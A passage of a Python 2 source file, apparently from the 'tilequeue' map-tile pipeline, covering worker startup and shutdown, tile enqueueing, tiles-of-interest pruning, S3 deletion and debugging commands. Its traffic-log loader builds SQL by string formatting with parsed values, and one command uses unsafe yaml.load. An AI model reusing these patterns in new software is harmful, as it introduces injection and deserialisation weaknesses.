cfg.metatile_start_zoom)
data_processor = ProcessAndFormatData(
post_process_data, formats, sql_data_fetch_queue, processor_queue,
cfg.buffer_cfg, output_calc_mapping, layer_data, tile_proc_logger,
stats_handler)
s3_storage = S3Storage(processor_queue, s3_store_queue, io_pool, store,
tile_proc_logger, cfg.metatile_size)
thread_tile_writer_stop = threading.Event()
tile_queue_writer = TileQueueWriter(
queue_mapper, s3_store_queue, peripherals.inflight_mgr,
msg_tracker, tile_proc_logger, stats_handler,
thread_tile_writer_stop)
def create_and_start_thread(fn, *args):
t = threading.Thread(target=fn, args=args)
t.start()
return t
thread_tile_queue_reader = create_and_start_thread(tile_queue_reader)
threads_data_fetch = []
threads_data_fetch_stop = []
for i in range(n_simultaneous_query_sets):
thread_data_fetch_stop = threading.Event()
thread_data_fetch = create_and_start_thread(data_fetch,
thread_data_fetch_stop)
threads_data_fetch.append(thread_data_fetch)
threads_data_fetch_stop.append(thread_data_fetch_stop)
# create a data processor per cpu
n_data_processors = n_cpu
data_processors = []
data_processors_stop = []
for i in range(n_data_processors):
data_processor_stop = multiprocessing.Event()
process_data_processor = multiprocessing.Process(
target=data_processor, args=(data_processor_stop,))
process_data_processor.start()
data_processors.append(process_data_processor)
data_processors_stop.append(data_processor_stop)
threads_s3_storage = []
threads_s3_storage_stop = []
for i in range(n_simultaneous_s3_storage):
thread_s3_storage_stop = threading.Event()
thread_s3_storage = create_and_start_thread(s3_storage,
thread_s3_storage_stop)
threads_s3_storage.append(thread_s3_storage)
threads_s3_storage_stop.append(thread_s3_storage_stop)
thread_tile_writer = create_and_start_thread(tile_queue_writer)
if cfg.log_queue_sizes:
assert(cfg.log_queue_sizes_interval_seconds > 0)
queue_data = (
(tile_input_queue, 'queue'),
(sql_data_fetch_queue, 'sql'),
(processor_queue, 'proc'),
(s3_store_queue, 's3'),
)
queue_printer_thread_stop = threading.Event()
queue_printer = QueuePrint(
cfg.log_queue_sizes_interval_seconds, queue_data, tile_proc_logger,
queue_printer_thread_stop)
queue_printer_thread = create_and_start_thread(queue_printer)
else:
queue_printer_thread = None
queue_printer_thread_stop = None
def stop_all_workers(signum, stack):
tile_proc_logger.lifecycle('tilequeue processing shutdown ...')
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ...')
# each worker guards its read loop with an event object
# ask all these to stop first
thread_tile_queue_reader_stop.set()
for thread_data_fetch_stop in threads_data_fetch_stop:
thread_data_fetch_stop.set()
for data_processor_stop in data_processors_stop:
data_processor_stop.set()
for thread_s3_storage_stop in threads_s3_storage_stop:
thread_s3_storage_stop.set()
thread_tile_writer_stop.set()
if queue_printer_thread_stop:
queue_printer_thread_stop.set()
tile_proc_logger.lifecycle(
'requesting all workers (threads and processes) stop ... done')
# Once workers receive a stop event, they will keep reading
# from their queues until they receive a sentinel value. This
# is mandatory so that no messages will remain on queues when
# asked to join. Otherwise, we never terminate.
tile_proc_logger.lifecycle('joining all workers ...')
tile_proc_logger.lifecycle('joining tile queue reader ...')
thread_tile_queue_reader.join()
tile_proc_logger.lifecycle('joining tile queue reader ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ...')
for i in range(len(threads_data_fetch)):
tile_input_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data fetchers ... done')
tile_proc_logger.lifecycle('joining data fetchers ...')
for thread_data_fetch in threads_data_fetch:
thread_data_fetch.join()
tile_proc_logger.lifecycle('joining data fetchers ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ...')
for i in range(len(data_processors)):
sql_data_fetch_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for data processors ... done')
tile_proc_logger.lifecycle('joining data processors ...')
for data_processor in data_processors:
data_processor.join()
tile_proc_logger.lifecycle('joining data processors ... done')
tile_proc_logger.lifecycle('enqueueing sentinels for s3 storage ...')
for i in range(len(threads_s3_storage)):
processor_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinels for s3 storage ... done')
tile_proc_logger.lifecycle('joining s3 storage ...')
for thread_s3_storage in threads_s3_storage:
thread_s3_storage.join()
tile_proc_logger.lifecycle('joining s3 storage ... done')
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ...')
s3_store_queue.put(None)
tile_proc_logger.lifecycle(
'enqueueing sentinel for tile queue writer ... done')
tile_proc_logger.lifecycle('joining tile queue writer ...')
thread_tile_writer.join()
tile_proc_logger.lifecycle('joining tile queue writer ... done')
if queue_printer_thread:
tile_proc_logger.lifecycle('joining queue printer ...')
queue_printer_thread.join()
tile_proc_logger.lifecycle('joining queue printer ... done')
tile_proc_logger.lifecycle('joining all workers ... done')
tile_proc_logger.lifecycle('joining io pool ...')
io_pool.close()
io_pool.join()
tile_proc_logger.lifecycle('joining io pool ... done')
tile_proc_logger.lifecycle('joining multiprocess data fetch queue ...')
sql_data_fetch_queue.close()
sql_data_fetch_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess data fetch queue ... done')
tile_proc_logger.lifecycle('joining multiprocess process queue ...')
processor_queue.close()
processor_queue.join_thread()
tile_proc_logger.lifecycle(
'joining multiprocess process queue ... done')
tile_proc_logger.lifecycle('tilequeue processing shutdown ... done')
sys.exit(0)
signal.signal(signal.SIGTERM, stop_all_workers)
signal.signal(signal.SIGINT, stop_all_workers)
signal.signal(signal.SIGQUIT, stop_all_workers)
tile_proc_logger.lifecycle('all tilequeue threads and processes started')
# this is necessary for the main thread to receive signals
# when joining on threads/processes, the signal is never received
# http://www.luke.maurits.id.au/blog/post/threads-and-signals-in-python.html
while True:
time.sleep(1024)
def coords_generator_from_queue(queue):
"""given a python queue, read from it and yield coordinates"""
while True:
coord = queue.get()
if coord is None:
break
yield coord
def tilequeue_seed(cfg, peripherals):
logger = make_logger(cfg, 'seed')
logger.info('Seeding tiles ...')
queue_writer = peripherals.queue_writer
# based on cfg, create tile generator
tile_generator = make_seed_tile_generator(cfg)
queue_buf_size = 1024
tile_queue_queue = Queue.Queue(queue_buf_size)
# updating tile queue happens in background threads
def tile_queue_enqueue():
coords = coords_generator_from_queue(tile_queue_queue)
queue_writer.enqueue_batch(coords)
logger.info('Enqueueing ... ')
thread_enqueue = threading.Thread(target=tile_queue_enqueue)
thread_enqueue.start()
n_coords = 0
for coord in tile_generator:
tile_queue_queue.put(coord)
n_coords += 1
if n_coords % 100000 == 0:
logger.info('%d enqueued' % n_coords)
tile_queue_queue.put(None)
thread_enqueue.join()
logger.info('Enqueueing ... done')
if cfg.seed_should_add_to_tiles_of_interest:
logger.info('Adding to Tiles of Interest ... ')
if (cfg.toi_store_type == 'file' and
not os.path.exists(cfg.toi_store_file_name)):
toi_set = set()
else:
toi_set = peripherals.toi.fetch_tiles_of_interest()
tile_generator = make_seed_tile_generator(cfg)
for coord in tile_generator:
coord_int = coord_marshall_int(coord)
toi_set.add(coord_int)
peripherals.toi.set_tiles_of_interest(toi_set)
emit_toi_stats(toi_set, peripherals)
logger.info('Adding to Tiles of Interest ... done')
logger.info('Seeding tiles ... done')
logger.info('%d coordinates enqueued' % n_coords)
def tilequeue_enqueue_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
coords = []
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom <= cfg.max_zoom:
coords.append(coord)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_stdin(cfg, peripherals):
logger = make_logger(cfg, 'enqueue_stdin')
def _stdin_coord_generator():
for line in sys.stdin:
line = line.strip()
coord = deserialize_coord(line)
if coord is not None:
yield coord
queue_writer = peripherals.queue_writer
coords = _stdin_coord_generator()
n_queued, n_in_flight = queue_writer.enqueue_batch(coords)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
def coord_pyramid(coord, zoom_start, zoom_stop):
"""
generate full pyramid for coord
Generate the full pyramid for a single coordinate. Note that zoom_stop is
exclusive.
"""
if zoom_start <= coord.zoom:
yield coord
for child_coord in coord_children_range(coord, zoom_stop):
if zoom_start <= child_coord.zoom:
yield child_coord
def coord_pyramids(coords, zoom_start, zoom_stop):
"""
generate full pyramid for coords
Generate the full pyramid for the list of coords. Note that zoom_stop is
exclusive.
"""
for coord in coords:
for child in coord_pyramid(coord, zoom_start, zoom_stop):
yield child
def tilequeue_enqueue_full_pyramid_from_toi(cfg, peripherals, args):
"""enqueue a full pyramid from the z10 toi"""
logger = make_logger(cfg, 'enqueue_tiles_of_interest')
logger.info('Enqueueing tiles of interest')
logger.info('Fetching tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching tiles of interest ... done')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
ungrouped = []
coords_at_group_zoom = set()
for coord_int in tiles_of_interest:
coord = coord_unmarshall_int(coord_int)
if coord.zoom < zoom_start:
ungrouped.append(coord)
if coord.zoom >= group_by_zoom:
coord_at_group_zoom = coord.zoomTo(group_by_zoom).container()
coords_at_group_zoom.add(coord_at_group_zoom)
pyramids = coord_pyramids(coords_at_group_zoom, zoom_start, zoom_stop)
coords_to_enqueue = chain(ungrouped, pyramids)
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(coords_to_enqueue)
logger.info('%d enqueued - %d in flight' % (n_queued, n_in_flight))
logger.info('%d tiles of interest processed' % n_toi)
def tilequeue_enqueue_random_pyramids(cfg, peripherals, args):
"""enqueue random pyramids"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
logger = make_logger(cfg, 'enqueue_random_pyramids')
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml, 'Missing rawr yaml'
group_by_zoom = rawr_yaml.get('group-zoom')
assert group_by_zoom, 'Missing rawr group-zoom'
assert isinstance(group_by_zoom, int), 'Invalid rawr group-zoom'
if args.zoom_start is None:
zoom_start = group_by_zoom
else:
zoom_start = args.zoom_start
if args.zoom_stop is None:
zoom_stop = cfg.max_zoom + 1 # +1 because exclusive
else:
zoom_stop = args.zoom_stop
assert zoom_start >= group_by_zoom
assert zoom_stop > zoom_start
gridsize = args.gridsize
total_samples = getattr(args, 'n-samples')
samples_per_cell = total_samples / (gridsize * gridsize)
tileset_dim = 2 ** group_by_zoom
scale_factor = float(tileset_dim) / float(gridsize)
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
for grid_y in xrange(gridsize):
tile_y_min = int(grid_y * scale_factor)
tile_y_max = int((grid_y+1) * scale_factor)
for grid_x in xrange(gridsize):
tile_x_min = int(grid_x * scale_factor)
tile_x_max = int((grid_x+1) * scale_factor)
cell_samples = set()
for i in xrange(samples_per_cell):
while True:
rand_x = randrange(tile_x_min, tile_x_max)
rand_y = randrange(tile_y_min, tile_y_max)
sample = rand_x, rand_y
if sample in cell_samples:
continue
cell_samples.add(sample)
break
# enqueue a cell at a time
# the queue mapper expects to be able to read the entirety of the
# input into memory first
for x, y in cell_samples:
coord = Coordinate(zoom=group_by_zoom, column=x, row=y)
pyramid = coord_pyramid(coord, zoom_start, zoom_stop)
rawr_enqueuer(pyramid)
def tilequeue_consume_tile_traffic(cfg, peripherals):
logger = make_logger(cfg, 'consume_tile_traffic')
logger.info('Consuming tile traffic logs ...')
tile_log_records = None
with open(cfg.tile_traffic_log_path, 'r') as log_file:
tile_log_records = parse_log_file(log_file)
if not tile_log_records:
logger.info("Couldn't parse log file")
sys.exit(1)
conn_info = dict(cfg.postgresql_conn_info)
dbnames = conn_info.pop('dbnames')
sql_conn_pool = DBConnectionPool(dbnames, conn_info, False)
sql_conn = sql_conn_pool.get_conns(1)[0]
with sql_conn.cursor() as cursor:
# insert the log records after the latest_date
cursor.execute('SELECT max(date) from tile_traffic_v4')
max_timestamp = cursor.fetchone()[0]
n_coords_inserted = 0
for host, timestamp, coord_int in tile_log_records:
if not max_timestamp or timestamp > max_timestamp:
coord = coord_unmarshall_int(coord_int)
cursor.execute(
"INSERT into tile_traffic_v4 "
"(date, z, x, y, tilesize, service, host) VALUES "
"('%s', %d, %d, %d, %d, '%s', '%s')"
% (timestamp, coord.zoom, coord.column, coord.row, 512,
'vector-tiles', host))
n_coords_inserted += 1
logger.info('Inserted %d records' % n_coords_inserted)
sql_conn_pool.put_conns([sql_conn])
def emit_toi_stats(toi_set, peripherals):
"""
Calculates new TOI stats and emits them via statsd.
"""
count_by_zoom = defaultdict(int)
total = 0
for coord_int in toi_set:
coord = coord_unmarshall_int(coord_int)
count_by_zoom[coord.zoom] += 1
total += 1
peripherals.stats.gauge('tiles-of-interest.count', total)
for zoom, count in count_by_zoom.items():
peripherals.stats.gauge(
'tiles-of-interest.by-zoom.z{:02d}'.format(zoom),
count
)
def tilequeue_prune_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'prune_tiles_of_interest')
logger.info('Pruning tiles of interest ...')
time_overall = peripherals.stats.timer('gardener.overall')
time_overall.start()
logger.info('Fetching tiles recently requested ...')
import psycopg2
prune_cfg = cfg.yml.get('toi-prune', {})
tile_history_cfg = prune_cfg.get('tile-history', {})
db_conn_info = tile_history_cfg.get('database-uri')
assert db_conn_info, ("A postgres-compatible connection URI must "
"be present in the config yaml")
redshift_days_to_query = tile_history_cfg.get('days')
assert redshift_days_to_query, ("Number of days to query "
"redshift is not specified")
redshift_zoom_cutoff = int(tile_history_cfg.get('max-zoom', '16'))
# flag indicating that s3 entry in toi-prune is used for s3 store
legacy_fallback = 's3' in prune_cfg
store_parts = prune_cfg.get('s3') or prune_cfg.get('store')
assert store_parts, (
'The configuration of a store containing tiles to delete must be '
'specified under toi-prune:store or toi-prune:s3')
# explictly override the store configuration with values provided
# in toi-prune:s3
if legacy_fallback:
cfg.store_type = 's3'
cfg.s3_bucket = store_parts['bucket']
cfg.s3_date_prefix = store_parts['date-prefix']
cfg.s3_path = store_parts['path']
redshift_results = defaultdict(int)
with psycopg2.connect(db_conn_info) as conn:
with conn.cursor() as cur:
cur.execute("""
select x, y, z, tilesize, count(*)
from tile_traffic_v4
where (date >= (current_timestamp - interval '{days} days'))
and (z between 0 and {max_zoom})
and (x between 0 and pow(2,z)-1)
and (y between 0 and pow(2,z)-1)
and (service = 'vector-tiles')
group by z, x, y, tilesize
order by z, x, y, tilesize
""".format(
days=redshift_days_to_query,
max_zoom=redshift_zoom_cutoff
))
for (x, y, z, tile_size, count) in cur:
coord = create_coord(x, y, z)
try:
tile_size_as_zoom = metatile_zoom_from_str(tile_size)
# tile size as zoom > cfg.metatile_zoom would mean that
# someone requested a tile larger than the system is
# currently configured to support (might have been a
# previous configuration).
assert tile_size_as_zoom <= cfg.metatile_zoom
tile_zoom_offset = tile_size_as_zoom - cfg.metatile_zoom
except AssertionError:
# we don't want bogus data to kill the whole process, but
# it's helpful to have a warning. we'll just skip the bad
# row and continue.
logger.warning('Tile size %r is bogus. Should be None, '
'256, 512 or 1024' % (tile_size,))
continue
if tile_zoom_offset:
# if the tile is not the same size as the metatile, then we
# need to offset the zoom to make sure we enqueue the job
# which results in this coordinate being rendered.
coord = coord.zoomBy(tile_zoom_offset).container()
# just in case we fell off the end of the zoom scale.
if coord.zoom < 0:
continue
# Sum the counts from the 256 and 512 tile requests into the
# slot for the 512 tile.
coord_int = coord_marshall_int(coord)
redshift_results[coord_int] += count
logger.info('Fetching tiles recently requested ... done. %s found',
len(redshift_results))
cutoff_cfg = prune_cfg.get('cutoff', {})
cutoff_requests = cutoff_cfg.get('min-requests', 0)
cutoff_tiles = cutoff_cfg.get('max-tiles', 0)
logger.info('Finding %s tiles requested %s+ times ...',
cutoff_tiles,
cutoff_requests,
)
new_toi = set()
for coord_int, count in sorted(
redshift_results.iteritems(),
key=operator.itemgetter(1),
reverse=True)[:cutoff_tiles]:
if count >= cutoff_requests:
new_toi.add(coord_int)
redshift_results = None
logger.info('Finding %s tiles requested %s+ times ... done. Found %s',
cutoff_tiles,
cutoff_requests,
len(new_toi),
)
for name, info in prune_cfg.get('always-include', {}).items():
logger.info('Adding in tiles from %s ...', name)
immortal_tiles = set()
if 'bbox' in info:
bounds = map(float, info['bbox'].split(','))
for coord in tile_generator_for_single_bounds(
bounds, info['min_zoom'], info['max_zoom']):
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
elif 'tiles' in info:
tiles = map(deserialize_coord, info['tiles'])
tiles = map(coord_marshall_int, tiles)
immortal_tiles.update(tiles)
elif 'file' in info:
with open(info['file'], 'r') as f:
immortal_tiles.update(
coord_marshall_int(deserialize_coord(line.strip()))
for line in f
)
elif 'bucket' in info:
from boto import connect_s3
from boto.s3.bucket import Bucket
s3_conn = connect_s3()
bucket = Bucket(s3_conn, info['bucket'])
key = bucket.get_key(info['key'])
raw_coord_data = key.get_contents_as_string()
for line in raw_coord_data.splitlines():
coord = deserialize_coord(line.strip())
if coord:
# NOTE: the tiles in the file should be of the
# same size as the toi
coord_int = coord_marshall_int(coord)
immortal_tiles.add(coord_int)
# Filter out nulls that might sneak in for various reasons
immortal_tiles = filter(None, immortal_tiles)
n_inc = len(immortal_tiles)
new_toi = new_toi.union(immortal_tiles)
# ensure that the new coordinates have valid zooms
new_toi_valid_range = set()
for coord_int in new_toi:
coord = coord_unmarshall_int(coord_int)
if coord_is_valid(coord, cfg.max_zoom):
new_toi_valid_range.add(coord_int)
new_toi = new_toi_valid_range
logger.info('Adding in tiles from %s ... done. %s found', name, n_inc)
logger.info('New tiles of interest set includes %s tiles', len(new_toi))
logger.info('Fetching existing tiles of interest ...')
tiles_of_interest = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(tiles_of_interest)
logger.info('Fetching existing tiles of interest ... done. %s found',
n_toi)
logger.info('Computing tiles to remove ...')
toi_to_remove = tiles_of_interest - new_toi
logger.info('Computing tiles to remove ... done. %s found',
len(toi_to_remove))
peripherals.stats.gauge('gardener.removed', len(toi_to_remove))
store = _make_store(cfg)
if not toi_to_remove:
logger.info('Skipping TOI remove step because there are '
'no tiles to remove')
else:
logger.info('Removing %s tiles from TOI and S3 ...',
len(toi_to_remove))
for coord_ints in grouper(toi_to_remove, 1000):
removed = store.delete_tiles(
map(coord_unmarshall_int, coord_ints),
lookup_format_by_extension(
store_parts['format']), store_parts['layer'])
logger.info('Removed %s tiles from S3', removed)
logger.info('Removing %s tiles from TOI and S3 ... done',
len(toi_to_remove))
logger.info('Computing tiles to add ...')
toi_to_add = new_toi - tiles_of_interest
logger.info('Computing tiles to add ... done. %s found',
len(toi_to_add))
peripherals.stats.gauge('gardener.added', len(toi_to_add))
if not toi_to_add:
logger.info('Skipping TOI add step because there are '
'no tiles to add')
else:
logger.info('Enqueueing %s tiles ...', len(toi_to_add))
queue_writer = peripherals.queue_writer
n_queued, n_in_flight = queue_writer.enqueue_batch(
coord_unmarshall_int(coord_int) for coord_int in toi_to_add
)
logger.info('Enqueueing %s tiles ... done', len(toi_to_add))
if toi_to_add or toi_to_remove:
logger.info('Setting new tiles of interest ... ')
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new tiles of interest ... done')
else:
logger.info('Tiles of interest did not change, '
'so not setting new tiles of interest')
logger.info('Pruning tiles of interest ... done')
time_overall.stop()
def tilequeue_process_wof_neighbourhoods(cfg, peripherals):
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_url_neighbourhood_fetcher
from tilequeue.wof import make_wof_processor
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF process neighbourhoods run started')
n_raw_neighbourhood_fetch_threads = 5
fetcher = make_wof_url_neighbourhood_fetcher(
wof_cfg['neighbourhoods-meta-url'],
wof_cfg['microhoods-meta-url'],
wof_cfg['macrohoods-meta-url'],
wof_cfg['boroughs-meta-url'],
wof_cfg['data-prefix-url'],
n_raw_neighbourhood_fetch_threads,
wof_cfg.get('max-retries', 0)
)
model = make_wof_model(wof_cfg['postgresql'])
current_date = datetime.date.today()
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, peripherals.msg_marshaller)
processor = make_wof_processor(
fetcher, model, peripherals.toi, rawr_enqueuer, logger, current_date)
logger.info('Processing ...')
processor()
logger.info('Processing ... done')
logger.info('WOF process neighbourhoods run completed')
def tilequeue_initial_load_wof_neighbourhoods(cfg, peripherals):
from tilequeue.wof import make_wof_initial_loader
from tilequeue.wof import make_wof_model
from tilequeue.wof import make_wof_filesystem_neighbourhood_fetcher
wof_cfg = cfg.wof
assert wof_cfg, 'Missing wof config'
logger = make_logger(cfg, 'wof_process_neighbourhoods')
logger.info('WOF initial neighbourhoods load run started')
n_raw_neighbourhood_fetch_threads = 50
fetcher = make_wof_filesystem_neighbourhood_fetcher(
wof_cfg['data-path'],
n_raw_neighbourhood_fetch_threads,
)
model = make_wof_model(wof_cfg['postgresql'])
loader = make_wof_initial_loader(fetcher, model, logger)
logger.info('Loading ...')
loader()
logger.info('Loading ... done')
def tilequeue_dump_tiles_of_interest(cfg, peripherals):
logger = make_logger(cfg, 'dump_tiles_of_interest')
logger.info('Dumping tiles of interest')
logger.info('Fetching tiles of interest ...')
toi_set = peripherals.toi.fetch_tiles_of_interest()
n_toi = len(toi_set)
logger.info('Fetching tiles of interest ... done')
toi_filename = "toi.txt"
logger.info('Writing %d tiles of interest to %s ...', n_toi, toi_filename)
with open(toi_filename, "w") as f:
save_set_to_fp(toi_set, f)
logger.info(
'Writing %d tiles of interest to %s ... done',
n_toi,
toi_filename
)
def tilequeue_load_tiles_of_interest(cfg, peripherals):
"""
Given a newline-delimited file containing tile coordinates in
`zoom/column/row` format, load those tiles into the tiles of interest.
"""
logger = make_logger(cfg, 'load_tiles_of_interest')
toi_filename = "toi.txt"
logger.info('Loading tiles of interest from %s ... ', toi_filename)
with open(toi_filename, 'r') as f:
new_toi = load_set_from_fp(f)
logger.info('Loading tiles of interest from %s ... done', toi_filename)
logger.info('Setting new TOI (with %s tiles) ... ', len(new_toi))
peripherals.toi.set_tiles_of_interest(new_toi)
emit_toi_stats(new_toi, peripherals)
logger.info('Setting new TOI (with %s tiles) ... done', len(new_toi))
logger.info('Loading tiles of interest ... done')
def tilequeue_stuck_tiles(cfg, peripherals):
"""
Check which files exist on s3 but are not in toi.
"""
store = _make_store(cfg)
format = lookup_format_by_extension('zip')
layer = 'all'
assert peripherals.toi, 'Missing toi'
toi = peripherals.toi.fetch_tiles_of_interest()
for coord in store.list_tiles(format, layer):
coord_int = coord_marshall_int(coord)
if coord_int not in toi:
print serialize_coord(coord)
def tilequeue_delete_stuck_tiles(cfg, peripherals):
logger = make_logger(cfg, 'delete_stuck_tiles')
format = lookup_format_by_extension('zip')
layer = 'all'
store = _make_store(cfg)
logger.info('Removing tiles from S3 ...')
total_removed = 0
for coord_strs in grouper(sys.stdin, 1000):
coords = []
for coord_str in coord_strs:
coord = deserialize_coord(coord_str)
if coord:
coords.append(coord)
if coords:
n_removed = store.delete_tiles(coords, format, layer)
total_removed += n_removed
logger.info('Removed %s tiles from S3', n_removed)
logger.info('Total removed: %d', total_removed)
logger.info('Removing tiles from S3 ... DONE')
def tilequeue_tile_status(cfg, peripherals, args):
"""
Report the status of the given tiles in the store, queue and TOI.
"""
logger = make_logger(cfg, 'tile_status')
# friendly warning to avoid confusion when this command outputs nothing
# at all when called with no positional arguments.
if not args.coords:
logger.warning('No coordinates given on the command line.')
return
# pre-load TOI to avoid having to do it for each coordinate
toi = None
if peripherals.toi:
toi = peripherals.toi.fetch_tiles_of_interest()
# TODO: make these configurable!
tile_format = lookup_format_by_extension('zip')
store = _make_store(cfg)
for coord_str in args.coords:
coord = deserialize_coord(coord_str)
# input checking! make sure that the coordinate is okay to use in
# the rest of the code.
if not coord:
logger.warning('Could not deserialize %r as coordinate', coord_str)
continue
if not coord_is_valid(coord):
logger.warning('Coordinate is not valid: %r (parsed from %r)',
coord, coord_str)
continue
# now we think we probably have a valid coordinate. go look up
# whether it exists in various places.
logger.info("=== %s ===", coord_str)
coord_int = coord_marshall_int(coord)
if peripherals.inflight_mgr:
is_inflight = peripherals.inflight_mgr.is_inflight(coord)
logger.info('inflight: %r', is_inflight)
if toi:
in_toi = coord_int in toi
logger.info('in TOI: %r' % (in_toi,))
data = store.read_tile(coord, tile_format)
logger.info('tile in store: %r', bool(data))
class TileArgumentParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
class FakeStatsd(object):
def __init__(self, *args, **kwargs):
pass
def incr(self, *args, **kwargs):
pass
def decr(self, *args, **kwargs):
pass
def gauge(self, *args, **kwargs):
pass
def set(self, *args, **kwargs):
pass
def timing(self, *args, **kwargs):
pass
def timer(self, *args, **kwargs):
return FakeStatsTimer()
def pipeline(self):
return self
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class FakeStatsTimer(object):
def __init__(self, *args, **kwargs):
pass
def start(self):
pass
def stop(self):
pass
def tilequeue_process_tile(cfg, peripherals, args):
if not args.coord:
print >> sys.stderr, 'Missing coord argument'
sys.exit(1)
coord_str = args.coord
coord = deserialize_coord(coord_str)
if not coord:
print >> sys.stderr, 'Invalid coordinate: %s' % coord_str
sys.exit(2)
with open(cfg.query_cfg) as query_cfg_fp:
query_cfg = yaml.load(query_cfg_fp)
all_layer_data, layer_data, post_process_data = (
parse_layer_data(
query_cfg, cfg.buffer_cfg, os.path.dirname(cfg.query_cfg)))
output_calc_mapping = make_output_calc_mapping(cfg.process_yaml_cfg)
formats = lookup_formats(cfg.output_formats)
io_pool = ThreadPool(len(layer_data))
data_fetcher = make_data_fetcher(cfg, layer_data, query_cfg, io_pool)
for fetch, _ in data_fetcher.fetch_tiles([dict(coord=coord)]):
formatted_tiles, extra_data = process(
coord, cfg.metatile_zoom, fetch, layer_data, post_process_data,
formats, cfg.buffer_cfg, output_calc_mapping, cfg.max_zoom,
cfg.tile_sizes)
# can think about making this configurable
# but this is intended for debugging anyway
json_tile = [x for x in formatted_tiles
if x['format'].extension == 'json']
assert json_tile
json_tile = json_tile[0]
tile_data = json_tile['tile']
print tile_data
def tilequeue_rawr_enqueue(cfg, args):
"""command to take tile expiry path and enqueue for rawr tile generation"""
from tilequeue.stats import RawrTileEnqueueStatsHandler
from tilequeue.rawr import make_rawr_enqueuer_from_cfg
msg_marshall_yaml = cfg.yml.get('message-marshall')
assert msg_marshall_yaml, 'Missing message-marshall config'
msg_marshaller = make_message_marshaller(msg_marshall_yaml)
logger = make_logger(cfg, 'rawr_enqueue')
stats = make_statsd_client_from_cfg(cfg)
stats_handler = RawrTileEnqueueStatsHandler(stats)
rawr_enqueuer = make_rawr_enqueuer_from_cfg(
cfg, logger, stats_handler, msg_marshaller)
with open(args.expiry_path) as fh:
coords = create_coords_generator_from_tiles_file(fh)
rawr_enqueuer(coords)
def _tilequeue_rawr_setup(cfg,
s3_role_arn=None,
s3_role_session_duration_s=None):
"""command to read from rawr queue and generate rawr tiles
if `s3_role_arn` is non-empty then it will be used as the IAM role
to access the S3 and `s3_role_session_duration_s` determines the S3
session duration in seconds
"""
rawr_yaml = cfg.yml.get('rawr')
assert rawr_yaml is not None, 'Missing rawr configuration in yaml'
rawr_postgresql_yaml = rawr_yaml.get('postgresql')
assert rawr_postgresql_yaml, 'Missing rawr postgresql config'
from raw_tiles.formatter.msgpack import Msgpack
from raw_tiles.gen import RawrGenerator
from raw_tiles.source.conn import ConnectionContextManager
from raw_tiles.source import parse_sources
from raw_tiles.source import DEFAULT_SOURCES as DEFAULT_RAWR_SOURCES
from tilequeue.rawr import RawrS3Sink
from tilequeue.rawr import RawrStoreSink
import boto3
import botocore
# pass through the postgresql yaml config directly
conn_ctx = ConnectionContextManager(rawr_postgresql_yaml)
rawr_source_list = rawr_yaml.get('sources', DEFAULT_RAWR_SOURCES)
assert isinstance(rawr_source_list, list), \
'RAWR source list should be a list'
assert len(rawr_source_list) > 0, \
'RAWR source list should be non-empty'
rawr_store = rawr_yaml.get('store')
if rawr_store:
store = \
make_store(rawr_store,
s3_role_arn=s3_role_arn,
s3_role_session_duration_s=s3_role_session_duration_s)
rawr_sink = RawrStoreSink(store)
else:
rawr_sink_yaml = rawr_yaml.get('sink')
assert rawr_sink_yaml, 'Missing rawr sink config'
sink_type = rawr_sink_yaml.get('type')
assert sink_type, 'Missing rawr sink type'
if sink_type == 's3':
s3_cfg = rawr_sink_yaml.get('s3')
assert s3_cfg, 'Missing s3 config'
